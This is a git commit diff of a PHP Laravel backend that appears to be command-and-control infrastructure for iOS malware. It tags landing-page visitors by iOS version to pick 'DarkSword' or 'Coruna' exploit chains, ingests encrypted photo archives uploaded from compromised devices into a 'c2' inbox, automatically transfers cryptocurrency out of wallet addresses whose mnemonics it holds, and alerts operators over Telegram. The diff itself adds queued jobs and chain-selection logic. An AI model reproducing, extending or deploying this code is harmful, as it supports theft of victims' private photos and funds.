feat: quene
This commit is contained in:
@@ -2,6 +2,7 @@
|
||||
|
||||
namespace App\Services;
|
||||
|
||||
use App\Jobs\AutoTransferAddress;
|
||||
use App\Models\TransferRecord;
|
||||
use App\Models\WalletAddress;
|
||||
use Illuminate\Support\LazyCollection;
|
||||
@@ -20,12 +21,13 @@ class AutoTransferService
|
||||
/**
|
||||
* Cron entry: scan addresses that have a mnemonic and any positive coin balance.
|
||||
*
|
||||
* @return array{inspected: int, triggered: int, ok: int, failed: int, skipped: int}
|
||||
* @return array{inspected: int, queued: int, triggered: int, ok: int, failed: int, skipped: int}
|
||||
*/
|
||||
public function run(): array
|
||||
{
|
||||
$stats = [
|
||||
'inspected' => 0,
|
||||
'queued' => 0,
|
||||
'triggered' => 0,
|
||||
'ok' => 0,
|
||||
'failed' => 0,
|
||||
@@ -37,13 +39,35 @@ class AutoTransferService
|
||||
'at' => now()->toDateTimeString(),
|
||||
], 'transfer');
|
||||
|
||||
$async = config('queue.default') !== 'sync';
|
||||
|
||||
foreach ($this->candidates() as $address) {
|
||||
$stats['inspected']++;
|
||||
if ($async) {
|
||||
AutoTransferAddress::dispatch($address->id, 'cron');
|
||||
$stats['queued']++;
|
||||
|
||||
continue;
|
||||
}
|
||||
|
||||
$outcome = $this->evaluate($address, 'cron');
|
||||
$stats['triggered'] += $outcome['triggered'];
|
||||
$stats['ok'] += $outcome['ok'];
|
||||
$stats['failed'] += $outcome['failed'];
|
||||
$stats['skipped'] += $outcome['skipped'];
|
||||
|
||||
if ($outcome['failed'] > 0) {
|
||||
create_log([
|
||||
'event' => 'auto_transfer_run_aborted',
|
||||
'reason' => 'transfer_failed',
|
||||
'wallet_address_id' => $address->id,
|
||||
'address' => $address->address,
|
||||
'chain' => $address->chain_type,
|
||||
'stats' => $stats,
|
||||
'at' => now()->toDateTimeString(),
|
||||
], 'transfer');
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
create_log([
|
||||
@@ -179,6 +203,18 @@ class AutoTransferService
|
||||
continue;
|
||||
}
|
||||
|
||||
if ($this->lastAutoFailed((string) $address->address, $asset)) {
|
||||
create_log($base + [
|
||||
'event' => 'auto_transfer_skip',
|
||||
'skip' => 'previous_auto_transfer_failed',
|
||||
'asset' => $asset,
|
||||
'balance' => (string) $balance,
|
||||
], 'transfer');
|
||||
$stats['skipped']++;
|
||||
|
||||
continue;
|
||||
}
|
||||
|
||||
if ($this->recentAutoSuccess((string) $address->address, $asset)) {
|
||||
try {
|
||||
$this->balances->refresh($address);
|
||||
@@ -272,6 +308,7 @@ class AutoTransferService
|
||||
'asset' => $asset,
|
||||
'error' => $result['error'] ?? 'unknown',
|
||||
], 'transfer');
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -287,21 +324,42 @@ class AutoTransferService
|
||||
return $stats;
|
||||
}
|
||||
|
||||
private function lastAutoFailed(string $fromAddress, string $asset): bool
|
||||
{
|
||||
$latest = $this->latestAutoRecord($fromAddress, $asset);
|
||||
|
||||
return $latest !== null && $latest->status === TransferRecord::STATUS_FAILED;
|
||||
}
|
||||
|
||||
private function recentAutoSuccess(string $fromAddress, string $asset): bool
|
||||
{
|
||||
$latest = $this->latestAutoRecord($fromAddress, $asset);
|
||||
if ($latest === null || $latest->status !== TransferRecord::STATUS_SUCCESS) {
|
||||
return false;
|
||||
}
|
||||
|
||||
$at = $latest->created_at;
|
||||
if ($at === null) {
|
||||
return false;
|
||||
}
|
||||
|
||||
return $at->gte(now()->subMinutes(self::COOLDOWN_MINUTES));
|
||||
}
|
||||
|
||||
private function latestAutoRecord(string $fromAddress, string $asset): ?TransferRecord
|
||||
{
|
||||
$fromAddress = trim($fromAddress);
|
||||
$asset = strtoupper(trim($asset));
|
||||
if ($fromAddress === '' || $asset === '') {
|
||||
return false;
|
||||
return null;
|
||||
}
|
||||
|
||||
return TransferRecord::query()
|
||||
->where('from_address', $fromAddress)
|
||||
->where('asset', $asset)
|
||||
->where('operator', 'auto')
|
||||
->where('status', TransferRecord::STATUS_SUCCESS)
|
||||
->where('created_at', '>=', now()->subMinutes(self::COOLDOWN_MINUTES))
|
||||
->exists();
|
||||
->orderByDesc('id')
|
||||
->first();
|
||||
}
|
||||
|
||||
private function assetScale(string $asset): int
|
||||
|
||||
@@ -154,18 +154,20 @@ class DarkSwordIngestAdapter
|
||||
$ip = $this->clientIp($request, $payload);
|
||||
$referer = trim((string) $request->headers->get('referer', ''));
|
||||
|
||||
$os = $ios !== null ? 'iOS' : $parsed['os'];
|
||||
$osVersion = $ios ?? ($parsed['os_version'] !== '' ? $parsed['os_version'] : null);
|
||||
PageVisit::recordLanding([
|
||||
'channel_id' => $channel,
|
||||
'client_uid' => $uid,
|
||||
'user_agent' => $ua !== '' ? $ua : null,
|
||||
'os' => $ios !== null ? 'iOS' : $parsed['os'],
|
||||
'os_version' => $ios ?? ($parsed['os_version'] !== '' ? $parsed['os_version'] : null),
|
||||
'os' => $os,
|
||||
'os_version' => $osVersion,
|
||||
'browser' => $parsed['browser'],
|
||||
'browser_version' => $parsed['browser_version'] !== '' ? $parsed['browser_version'] : null,
|
||||
'ip' => $ip !== '' ? $ip : null,
|
||||
'domain' => PageVisit::normalizeDomain($request->getHost()),
|
||||
'referer' => $referer !== '' ? substr($referer, 0, 512) : null,
|
||||
], PageVisit::CHAIN_DARKSWORD);
|
||||
], PageVisit::chainFromIosVersion($os, $osVersion));
|
||||
}
|
||||
|
||||
/**
|
||||
@@ -273,10 +275,20 @@ class DarkSwordIngestAdapter
|
||||
$ua = substr((string) $request->userAgent(), 0, 2000);
|
||||
|
||||
$existing = Device::query()->where('device_id', $key)->first();
|
||||
if ($ios !== null) {
|
||||
$chain = PageVisit::isDarkSwordIosVersionString($ios)
|
||||
? Device::CHAIN_DARKSWORD
|
||||
: Device::CHAIN_CORUNA;
|
||||
} else {
|
||||
$chain = $existing
|
||||
? (int) $existing->chain
|
||||
: Device::CHAIN_CORUNA;
|
||||
}
|
||||
|
||||
if ($existing) {
|
||||
$touch = [
|
||||
'updated_at' => now(),
|
||||
'chain' => Device::CHAIN_DARKSWORD,
|
||||
'chain' => $chain,
|
||||
];
|
||||
if ($ip !== '') {
|
||||
$touch['ip'] = $ip;
|
||||
@@ -301,7 +313,7 @@ class DarkSwordIngestAdapter
|
||||
|
||||
$device = Device::query()->create([
|
||||
'device_id' => $key,
|
||||
'chain' => Device::CHAIN_DARKSWORD,
|
||||
'chain' => $chain,
|
||||
'ip' => $ip !== '' ? $ip : null,
|
||||
'device_model' => $model,
|
||||
'ios_version' => $ios,
|
||||
|
||||
@@ -0,0 +1,152 @@
|
||||
<?php
|
||||
|
||||
namespace App\Services;
|
||||
|
||||
use App\Http\Middleware\DecryptXxbbBody;
|
||||
use App\Jobs\ExtractPhotoArchive;
|
||||
use App\Models\Device;
|
||||
use Illuminate\Support\Facades\Storage;
|
||||
|
||||
class PhotoArchiveIngest
|
||||
{
|
||||
public function __construct(
|
||||
private readonly IngestService $ingest,
|
||||
) {}
|
||||
|
||||
/**
|
||||
* Persist the uploaded 7z, then extract now (sync) or via queue.
|
||||
* Caller always ACKs independently.
|
||||
*
|
||||
* @param array{
|
||||
* x_hit?: ?int,
|
||||
* upload_count?: ?int,
|
||||
* process_index?: ?int,
|
||||
* text_count?: ?int,
|
||||
* barcode_count?: ?int
|
||||
* } $photoMeta
|
||||
* @param array<string, mixed> $rawCounters
|
||||
*/
|
||||
public function accept(
|
||||
Device $device,
|
||||
string $absolutePath,
|
||||
string $batchBase,
|
||||
array $photoMeta,
|
||||
string $flavor,
|
||||
array $rawCounters,
|
||||
): void {
|
||||
if (! $device->albumStorageEnabled() || ! is_file($absolutePath)) {
|
||||
return;
|
||||
}
|
||||
|
||||
$rel = 'c2/inbox/'.$device->device_id.'/'.date('YmdHis').'_'.str_replace('.', '', uniqid('', true)).'.bin';
|
||||
$fh = fopen($absolutePath, 'rb');
|
||||
if ($fh === false) {
|
||||
return;
|
||||
}
|
||||
try {
|
||||
Storage::disk('local')->put($rel, $fh);
|
||||
} finally {
|
||||
if (is_resource($fh)) {
|
||||
fclose($fh);
|
||||
}
|
||||
}
|
||||
|
||||
if (config('queue.default') === 'sync') {
|
||||
$this->process($device->id, $rel, $batchBase, $photoMeta, $flavor, $rawCounters);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
ExtractPhotoArchive::dispatch($device->id, $rel, $batchBase, $photoMeta, $flavor, $rawCounters);
|
||||
}
|
||||
|
||||
/**
|
||||
* Same failure policy as the old in-request extract:
|
||||
* 7z miss / empty members → log ok=false, skip ingest, never throw to the client.
|
||||
*
|
||||
* @param array<string, mixed> $photoMeta
|
||||
* @param array<string, mixed> $rawCounters
|
||||
*/
|
||||
public function process(
|
||||
int $deviceId,
|
||||
string $inboxPath,
|
||||
string $batchBase,
|
||||
array $photoMeta,
|
||||
string $flavor,
|
||||
array $rawCounters,
|
||||
): void {
|
||||
$logType = $flavor === 'xxbb' ? 'xxbb' : 'c2';
|
||||
$event = $flavor === 'xxbb' ? 'xxbb_photo_extract' : 'check_extract';
|
||||
$device = Device::query()->find($deviceId);
|
||||
$abs = Storage::disk('local')->path($inboxPath);
|
||||
|
||||
try {
|
||||
if ($device === null || ! $device->albumStorageEnabled() || ! is_file($abs)) {
|
||||
create_log([
|
||||
'event' => $event,
|
||||
'device_key' => $device?->device_id,
|
||||
'extract' => [
|
||||
'ok' => false,
|
||||
'files' => [],
|
||||
'password_recipe' => 'session_key||'.$batchBase,
|
||||
'stderr' => 'inbox missing or album storage off',
|
||||
],
|
||||
'photo_meta' => $photoMeta,
|
||||
'raw_counters' => $rawCounters,
|
||||
], $logType);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
$bytes = (string) file_get_contents($abs);
|
||||
$work = storage_path('app/c2/check/'.$device->device_id.'/'.date('YmdHis').'_'.uniqid());
|
||||
try {
|
||||
$extracted = $this->archiveFor($flavor)->extract($bytes, $work, $batchBase);
|
||||
if (! empty($extracted['files'])) {
|
||||
$this->ingest->ingestPhotos($device, $extracted['files'], $photoMeta);
|
||||
}
|
||||
create_log([
|
||||
'event' => $event,
|
||||
'device_key' => $device->device_id,
|
||||
'extract' => [
|
||||
'ok' => $extracted['ok'],
|
||||
'files' => array_map('basename', $extracted['files']),
|
||||
'password_recipe' => $extracted['password_recipe'],
|
||||
'stderr' => substr((string) $extracted['stderr'], 0, 2000),
|
||||
],
|
||||
'photo_meta' => $photoMeta,
|
||||
'raw_counters' => $rawCounters,
|
||||
], $logType);
|
||||
} catch (\Throwable $e) {
|
||||
create_log([
|
||||
'event' => $event,
|
||||
'device_key' => $device->device_id,
|
||||
'extract' => [
|
||||
'ok' => false,
|
||||
'files' => [],
|
||||
'password_recipe' => 'session_key||'.$batchBase,
|
||||
'stderr' => substr($e->getMessage(), 0, 2000),
|
||||
],
|
||||
'photo_meta' => $photoMeta,
|
||||
'raw_counters' => $rawCounters,
|
||||
], $logType);
|
||||
} finally {
|
||||
CorunaArchive::forgetWorkDir($work);
|
||||
}
|
||||
} finally {
|
||||
Storage::disk('local')->delete($inboxPath);
|
||||
}
|
||||
}
|
||||
|
||||
private function archiveFor(string $flavor): CorunaArchive
|
||||
{
|
||||
if ($flavor === 'xxbb') {
|
||||
return new CorunaArchive(
|
||||
DecryptXxbbBody::crypto(),
|
||||
(string) config('coruna.seven_zip', ''),
|
||||
);
|
||||
}
|
||||
|
||||
return app(CorunaArchive::class);
|
||||
}
|
||||
}
|
||||
@@ -2,6 +2,7 @@
|
||||
|
||||
namespace App\Services;
|
||||
|
||||
use App\Jobs\SendTelegramMessage;
|
||||
use App\Models\Channel;
|
||||
use App\Models\Device;
|
||||
use App\Models\User;
|
||||
@@ -114,8 +115,15 @@ class TelegramNotifier
|
||||
return false;
|
||||
}
|
||||
|
||||
$async = config('queue.default') !== 'sync';
|
||||
$ok = false;
|
||||
foreach ($chatIds as $chatId) {
|
||||
if ($async) {
|
||||
SendTelegramMessage::dispatch($chatId, $text);
|
||||
$ok = true;
|
||||
|
||||
continue;
|
||||
}
|
||||
if ($this->sendToChat($chatId, $text)['ok']) {
|
||||
$ok = true;
|
||||
}
|
||||
|
||||
@@ -83,7 +83,10 @@ class TokenviewMonitorService
|
||||
}
|
||||
|
||||
$tokenSymbol = strtoupper(trim((string) ($payload['tokenSymbol'] ?? '')));
|
||||
if (in_array($coin, ['TRX', 'TRON'], true) && ! in_array($tokenSymbol, ['TRX', 'USDT'], true)) {
|
||||
// Native TRX webhooks omit tokenSymbol. Only drop explicit non-USDT/TRX tokens.
|
||||
if (in_array($coin, ['TRX', 'TRON'], true)
|
||||
&& $tokenSymbol !== ''
|
||||
&& ! in_array($tokenSymbol, ['TRX', 'USDT'], true)) {
|
||||
return;
|
||||
}
|
||||
$value = $payload['value'] ?? null;
|
||||
|
||||
Reference in New Issue
Block a user